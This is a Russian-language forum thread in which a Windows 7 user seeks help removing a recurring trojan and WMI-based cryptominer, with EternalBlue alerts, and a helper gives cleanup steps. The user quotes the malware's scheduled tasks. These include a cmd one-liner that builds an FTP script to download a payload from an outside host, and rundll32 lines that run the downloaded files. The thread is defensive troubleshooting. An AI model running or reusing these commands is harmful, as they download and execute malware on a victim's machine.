Не удается устранить источник проблемы (Trojan.Agent.Generic)

[REDACTED]

Добрый день!
Прошу помощи в лечении компьютера. Суть проблемы: периодически происходят попытки загрузки вирусных файлов с различных адресов. Обычно каждые 3 часа. Впервые проблема была замечена еще в мае, но тогда все успешно пофиксилось при помощи Trojan remover. Спустя 2 месяца угроза вновь появилась.
Примеры мест загрузки:
C:\Windows\debug\lsmose.exe
C:\Windows\debug\item.dat
Попытки заражения:
C:\Windows\system32\wbem\scrcons.exe (Заражение: Win32:Rootkit-gen [Rtk])
C:\Windows\system32\lsass.exe (Заражение: URL:Mal)
Были и другие места, но к сожалению старых отчетов не осталось.

В запланированных задачах регулярно появляются такие записи:
Mysa1 -- rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Mysa2 -- cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
Ок -- rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Чистка с помощью Malwarebytes помогает только на день (обнаруживает Trojan.Agent.Generic), потом записи появляются снова. Также были использованы: Avast, Trojan remover, Cureit, AdwCleaner. Все безуспешно.
Система Windows 7 (64 bit). Антивирус Avast Free.

[REDACTED]

Также прикрепляю первый отчет Malwarebytes от 18.07.17

[REDACTED]

Народ, у вас хелперы в отпуске что ли?
Создал тему, т.к. нечто подобное уже решали здесь.

Вот, еще скрины приложу, на всякий.

[Andrey,pro]

alndr, здравствуйте и добро пожаловать на форум!

К сожалению, не было возможности ответить раньше...

• Сохраните прикрепленный файл fixlist.txt в папку, откуда был запущен FRST (M:\install)
  
• Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  
• Обратите внимание, что компьютер будет перезагружен.

ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!

После выполнения скрипта скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.

[REDACTED]

Добрый день. Вообще я уже проблему решил (хочется верить). CureIt, по всей видимости, занесли вирус в базу и последняя версия обнаружила скрипт, о котором вы говорите.

Угроза: [Trojan.Btc.Mine]
Заражение: \WMI\root\ActiveScriptEventConsumer {226c72e7-62e8-11d1-ad89-00c04fd8fdff}

После очистки уже 5 дней, как все в норме. Все равно выполнить ваши рекомендации?

[Andrey,pro]

Chessplayer, да, выполните скрипт в FRST, загружать WMI Explorer 2.0 уже не надо.

[REDACTED]

Andrey,pro, после выполнения скрипта и перезагрузки, аваст каждую минуту стал присылать сообщения об угрозе (на скриншоте). Начинается через час после каждой перезагрузки. Сканирование ничего не находит.

[REDACTED]

По уведомлениям видно, что это известный эксплойт EternalBlue, но Microsoft еще весной пофиксила эту уязвимость в обновлениях, а у меня установлены последние, за август. Сейчас закачалась еще пара небольших обновлений и пока все тихо.